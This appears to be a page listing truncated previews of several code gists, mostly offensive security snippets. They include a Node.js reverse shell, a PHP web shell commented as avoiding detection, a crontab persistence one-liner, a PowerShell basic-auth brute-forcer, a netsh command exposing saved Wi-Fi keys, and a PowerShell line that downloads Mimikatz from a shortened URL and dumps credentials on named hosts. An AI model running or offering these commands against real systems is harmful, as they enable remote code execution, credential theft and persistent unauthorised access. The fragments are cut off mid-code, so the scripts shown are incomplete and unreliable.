This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<!-- to do: make this parse --> | |
<div class="clipboardEmbedClip" data-clip-id="LQL1lDhsxPcZfc2h4vuk3E1MpI-5Xc_CPlqe" data-width="782" data-height="763" data-scale="disabled"> | |
</div> | |
<script type="text/javascript">(function() {if (!window.CLIPBOARD || !window.CLIPBOARD.widgets) {var elem = document.createElement("script");elem.type = "text/javascript";elem.async = true;elem.src = "//clipboard.com/js/widgets.js";var s = document.getElementsByTagName("script")[0];s.parentNode.insertBefore(elem, s);}})(); | |
</script> |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#/bin/python | |
# Uses pwntools: https://github.com/Gallopsled/pwntools | |
from pwn import * | |
#TARGET_SERVER = "127.0.0.1" | |
TARGET_SERVER = "54.233.105.81" | |
TARGET_PORT = 4242 | |
conn = remote(TARGET_SERVER, TARGET_PORT) | |
# Jump box is at 192.241.XXX.XXX |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
## Powershell For Penetration Testers Exam Task 1 - Brute Force Basic Authentication Cmtlet | |
function Brute-Basic-Auth | |
{ | |
<# | |
.SYNOPSIS | |
PowerShell cmdlet for brute forcing basic authentication on web servers. | |
.DESCRIPTION |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
var net = require('net'); | |
var spawn = require('child_process').spawn; | |
HOST="localhost"; | |
PORT="1234"; | |
TIMEOUT="5000"; | |
function c(HOST,PORT) { | |
var client = new net.Socket(); | |
client.connect(PORT, HOST, function() { |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
cc=”echo 'YOUR COMMANDS GO HERE'”;cj=”35 8 * * * $cc”; ( sudo crontab -l | grep -v "$cc" ; echo "$cj" ) | sudo crontab - |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<?php | |
ini_set('allow_url_include, 1'); // Allow url inclusion in this script | |
// No eval() calls, no system() calls, nothing normally seen as malicious. | |
include('php://input'); | |
?> |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
import datetime, sys | |
print datetime.datetime.fromtimestamp(float(sys.argv[1])) |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
netsh wlan show profiles name="the_name_of_your_network_profile" key=clear |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
powershell "IEX (New-Object Net.WebClient).DownloadString('http://is.gd/oeoFuI'); Invoke-Mimikatz -DumpCreds -ComputerName @('computer1', 'computer2')" |